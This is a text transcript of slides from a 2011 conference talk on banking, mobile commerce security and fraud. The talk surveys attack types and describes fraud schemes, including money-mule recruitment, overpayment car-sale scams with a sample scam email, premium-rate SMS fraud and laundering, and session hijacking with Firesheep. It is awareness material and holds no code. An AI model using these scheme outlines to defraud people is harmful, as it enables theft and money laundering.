Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference -...

7/31/2019 Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

http://slidepdf.com/reader/full/banking-systems-security-and-fraud-analysis-by-michalis-mavis-during-icompetences 1/50

Information Systems Fraud &Security Analysis

by Michalis Mavis, MSc, MScf. Chairman of Hellenic Fraud Forum

M-Commerce

Banking, Finance & Insurance



The current landscape

• The landscape today is characterized byconvergence of IT, Telecom, Entertainment andFinancial services.

• There is an explosive growth of smartphonescapabilities including, banking transactions andpayment possibilities, now performed basically by

various types of cards (credit/debit, magnetic, chipcards, etc.).• Some countries also in Africa already

applied mobile commerce technologies.

• Fraudsters are already present...in all banking activities.



Agenda• Specific security risks in banking systems

& m-commerce threats will be described.

• Business cases of relevant attacks andfraudulent activities will be given.

• Conclusions & recommendations.



M-Commerce & Micropayments

• According to the MPF (Mobile Payment Forum)mobile commerce is applicable to both

– micro (<$10) and – macro (>$10) payments.

both in a proximity and remote payment context.

• Most people have already experienced simple m-commerce transactions like ring tones, wallpaperdownload for their mobile phone.

• Banks face new security and fraud challengesrequiring changes in the mode of operations.



Definitions according to• M-Commerce

Electronic purchase of hard or soft goods, using amobile telecom device where mobile operator hasfull/partial financial stake/liability/responsibility.

• Micro-paymentsA micro-payment is defined as a low cost transaction(typically ranging from a few cents up to 10 Euro), for aphysical or digital item bought via or downloaded -recorded onto a mobile device and paid in a cashequivalent (i.e. a prepaid phone account, stored valueaccount or phone bill).

• M-Wallet

A payment platform from which subscribers can pay for

M-commerce transactions. Commonly set-up with atop-up arrangement from the subscriber’s bank orcredit card.



M-Commerce customer benefits

Mobile infrastructure provides the platformfor financial services, giving a lot of benefitsto the customers.

– There is no need to carry cash. It is cheap, fastand secure, to send money over distances.

– Security is provided by various ways (PIN, chip

set, etc.). – There is a user friendly interface.

– Convenience – deposit / withdraw

money or pay bills without havingto move or prepare a cheque.



The vision• Within the next years, the majority of

mobile devices (especially smartphones)will be capable of supporting mobilebanking transactions without importanttechnical modification.

• In this way, they will be able tosecurely authenticate theaccount holder

(e.g. “credit card” owner),to the “bank card” issuer.



M-commerce General info

• Content types• “ Soft” products - media, video clips, pre-paid

accounts, etc.

• “ Hard” products at POS: supermarkets, parking,tickets, vending machines.

• “ Hard” products with shipment: e.g. books,

appliances.• Payment methods

• Via the monthly phone bill or Prepaid account.

• M-commerce application i.e. M-wallet• Credit or debit card



Proximity payment technology

• With the new generation of smartphones and mobilenetworks there is an increase of mobile internet bankingoperations.

• The key driver for growth is the proximity NFC paymenttechnology (based on RFID, contactless systems).

• The embedded chip and antenna enable consumers towave their card over a reader at the point of sale.



Cyber Crime increase• Cyber crime is a growing phenomenon in

diversity and sophistication.• Hackers are already present in Mobile

banking operations.

• POS, ATM Systems are targetedby various criminals groups, with

high tech capabilities.



Threats and various risksto Finance Critical

Infrastructures



Initial step

• Some well known threats used to

penetrate security of banking systems. – Initial step: SQL injection (one of the most

common attack methods).

– Criminals then try to steal data fromdatabases including log-in user-id / passwdand other payment card information.

• Various types of vulnerabilities areexploited.



SQL injection• A successful SQL injection attack enables a

malicious user to execute commands in yourapplication's database by using the privilegesgranted to your application's login.

• The problem is more severe if your applicationuses an over-privileged account to connect tothe database.



A recent case

• A bank employee in cooperation with cybercriminals hacked the bank corporate network inthe following way:

– A USB stick including a WiFi unit was insertedin the bank server, by the bank employee

(internal fraud). – The criminals in the car outside the bankhacked the bank network

immediately.



Other types of attacks• Common types of attacks include:

– Cross-site scripting.

– Click-jacking.

– Skimming. – Phising attacks.

– Other IT infrastructure

attacks.



Cross-site scripting (XSS)

• XSS is a type of computer security vulnerabilitytypically found in web applications, that enablesattackers to inject client-side script into Web pages,

viewed by other users.• By finding ways of injecting malicious scripts into web

pages, an attacker can gain access-privileges tosensitive page-content, session cookies, and a variety

of other information maintained by the browser onbehalf of the user.

• Cross-site scripting carried out on websites accounted

for roughly 80% of all security vulnerabilities,documented by Symantec, as of 2007. (Wiki)



Click-jacking• A clickjacked page tricks a user into performing

undesired actions by clicking on a concealed link.

• On a clickjacked page, the attackers show a set of

dummy buttons, then load another page over it in atransparent layer. The users think that they areclicking the visible buttons, while they are actually

performing actions on the hidden page. (Wiki)



Skimming

• Skimming includes theft of credit card

information used in an otherwise legitimatetransaction.

• Sometimes, but not always, It is typically

an "inside job" by a dishonest employee.

• The purpose may be to obtain goods

without paying, or to obtain unauthorizedfunds from an account.



To which account to transfer the money ?

• They are not so crazy to transfer themoney to an account that was opened

under their name (with their ID-card orpassport).

• They are using other more advanced

techniques so that theymay get the money with-out been traced.

• How is it possible ?



How to transfer money without traces ?

• The fraudsters build a web site pretending theyare a big company looking for new employees.

• They provide forms to be filled in by candidates.• Then a candidate (victim-2) is “employed” by the

“company” and he is getting his first advance

salary (those are money taken from victim-1).• He is asked to keep a part

of the money and send the

rest to another location.



The money path is lost !• Victim-2 is asked to use Western union or

Moneygram money transfer systems (outsidethe normal banking sector), so that anybody witha false ID-card or passport may get the money.

• The money path is lost and there is no way tofind out who actually got the money !

• The money went somewhere in Africa...



Victim against Victim• Victim-1 finds out his money is gone from

his bank account.

• He ask assistance from the police.

• Following a short investigation victim-2 is

arrested.• There is no possibility for victim-2 to prove

that he is not guilty. He sent the money to

Africa to somebody that DOES NOTEXIST…



The “clever” scenario… diagram

Victim-1Provided by mistakehis Bank Account

credentials.

Victim-2Got the money from theVictim’s-1 Bank Accountfor a service that he

thought was legitimate

Fraudster

Got the money from victim-2and disappeared

Victim-1 sends the police to arrest victim-2thinking he is the fraudster …



Another scenario against Victim-2

• The previous scenario became known, so thefraudsters started using a more clever one,

connected with second hand car sellingbusiness.

• The car owners are selling their cars by using a

suitable web application.• The fraudster visits on-line car selling web

pages and buys a car on behalf of “his

customer”.



Buying and selling used cars online

• He sends more money from what the carowner requests, pretending that the restmoney should be sent to a person that will

undertake the car refreshing and shipping.• So, they ask from the receiving person to

send the excess money to a person via

Western union.• Look on an Email message received by

the car owner !



A very “honest”… Email• “I am delighted to tell you that my client appreciates

and commends your vehicle, with full interest. I havefinalized with my client on the price of 16,000 eurowhich is the last asking price for your vehicle and its okby him.

• He also instructed me to inform you that paymentwill get to you in an bank money transfer, at the amount

of 25,000 euro.• So you are required to deduct the cost of your

vehicle which is 16,000 euro, when payment gets to youand refund balance 9,000 euro to the Agent (our

shipper) for him to be able to offset shipping & taxcharges, and other cosmetic repair costs.”



Money Laundering

• In this way victim-2 is used as a moneylaundering tool for victim’s-1 money.

• The victim-2 gets 25.000 € and sends9.000 € to the fraudster.

• The fraudster’s real name remainsunknown even though the WesternUnion branch (where the money

were transferred) is known.



The poor Victim-2

• The car owner (victim-2) goes to prison

as responsible for the fraud, even thoughhe did not performed any illegal action(according to his understanding).

• The money he got (16.000 €) are takenback by the police and on top of that, he

lost 9.000 € and his car is unsold…



ID-theft for various crimes

Id tit Th ft



Identity TheftIs not only stealing our ID card but any other personaldocuments or data including :

– Our Name

– Date of birth – Nationality

– Fiscal Number (tax number)

– Credit card numbers and card secret numbers,

– e-mail data

– Signature

– Photograph

– Driving Licence and other documents – data that may beused to commit criminal activities.

Id theft by using Social



Id-theft by using Social

Networks• A lot of personal information may be found

unprotected in SocialNetworking sites.

• Proof of address by

stealing Power Billfrom user’s house.

• Faked documents not sodifficult to be produced.

H ki SN



Hacking SNs users

accountsBy using simple programs like Firesheep a hacker

may steal personal information contained in : – Social Networking Sites (like FaceBook, Twitter etc.)

– Email accounts (Google, Yahoo, etc.) and so on...

Firesheep hi-jacks other peoples session. Inorder to break into someones account justopen up FireSheep, click ‘Start Capturing’ and

it will list all the users in your network that arecurrently logged on.



The ring tone was deactivated from the US Cardphones

USA JFK airport(credit cards public

payphones)

PSTN

Portugal(fraudsters)

RINGTONE

OFF

Heavy trafficof unanswered calls.

Stealing Credit Cards…



Risks & roles in m-commerce

–Mobile Subscriber as fraudster.

–Mobile Subscriber as victim. –Content Provider as fraudster.

Value added services with mobile phones



Value added services with mobile phones

• Mobile phones may be used to : – buy a coca-cola from a venting machine (just

make a call to the number on the machine).

– Buy theater tickets

– Play in the Internet Casino, and many more

applications.• In many of those cases fraudsters have been

very active already (the casino case).

ON-LINE CASINO



ON LINE CASINO

How it works.

• Connect to Casino web site.• Then you are asked to send an SMS message using your

mobile phone, to a specific number, to get credit (marks). Forexample you get 100 € credit (charged to your mobile phone).

• You play games (you loose – you win).• At the end you may exchange the remaining marks (credit) if

any, with money that will be sent to your bank account, by thecasino.

• Fraudsters arrested in a European country.

INTENTITY THEFT AND SUBSCRIPTIONINTENTITY THEFT AND SUBSCRIPTION



INTENTITY THEFT AND SUBSCRIPTIONINTENTITY THEFT AND SUBSCRIPTIONFRAUD IN MOBILE PHONESFRAUD IN MOBILE PHONES……

S bscriber as fra dster cases



Subscriber as fraudster, cases

• Repeated downloads by subscriber, but onlybilled once. Fraudster apply technical ways ofrepeating a download already completed without

additional billing.• Fraudster makes money by illegally reselling

the digital product he bought.

• Billing records may be manipulated (internalfraud). No bill for m-commerce.

• Avoid being billed for content by falsifyingsuccessful download as unsuccessful.



More subscriber m-commerce frauds

• Cloned SIM cards used for m-commerce,billing the legitimate subscriber.

• IP spoofing: IP Packets from one deviceare made to appear as if coming from

another trusted device.• Attackers can use sniffers to

record traffic and steal credit

card details.

C t t P id f d



Content Provider fraud

(examples) – Goods purchased from Content Provider and

subscriber billed for content (as expected). Thensubscriber is billed illegally for repetitions of thefirst transaction.

– A rogue Content Provider may find ways of

delivering content without subscriberauthorisation or request, thereby inflating revenue.

– Content Provider falsifies a download failure, to justify additional uploads, whilst billing subscriber for

every upload.

M-commerce PRS fraud modus operandi



M-commerce PRS fraud modus operandi(Content Provider fraud)

• The content provider gets a lot of phones-SIM cards bysubscription fraud.

• He uses the fraudulent lines to make a lot of calls to his ownservices until their disconnection.

• The content provider is paid, even though the operator was not paidby the customer.

• The main concern of m-commerce PRS fraud is the speed at whichthe fraud loss can accumulate.

• An automatic device (a PC connected to a SIM card) is technicallyable to send at least one SMS per second.

• If micropayments are based on SMS, a fraudulent GSM line can

generate a tremendous loss at the end of one day.

PRS Fraud players



PRS Fraud players

Fraudster

Never paid

Telecom Operator

Paid

Content Provider

Money lost by the

Telecom Operator

Telecom Fraud & Money Laundering



y g

• PRS (Premium Rare telecom Services)are used for money laundering.

• How it is done ?

tax paradise islands

How money laundering is performed



How money laundering is performed …

• The PRS content provider has a lot of moneydue to illegal activities (drugs, guns etc.) andwants to legalize them.

• He builds a PRS service and starts making calls,at his own expenses, to his own services.

• The money earned

by the PRS contentprovider are nowlegal and clear !

Risks in M-commerce



Risks in M commerce

• Known types of Frauds (Subscriber as fraudster) – Subscription fraud / Roaming fraud

– Subscriber Content Theft (IPRs)

– Download without correct billing. – Content Duplication for distribution

• Technical Frauds (Subscriber as victim) – Session stealing

– Identity Spoofing (IP Spoofing) – Man-in-middle

– Electronic eavesdropping

– Billing inflation attack

– Receipt of goods not requested – Content with Trojan.

Conclusions



Conclusions• Banking activities and especially Mobile Commerce &Micropayments are continuously targeted services by

cyber criminals.

• There are a lot of security threats and risks associated

with those services.

• Fraudsters are already present and active in the area.

• The basic players should take all necessary measures

for protecting security and mitigate risks.• Banking security experts should have good

IT security but also telecom and mobilefraud background.



Thank youMichalis Mavis, MSc, MSc//gr.linkedin.com/in/mmavis

Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference -...

Documents

Transcript of Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference -...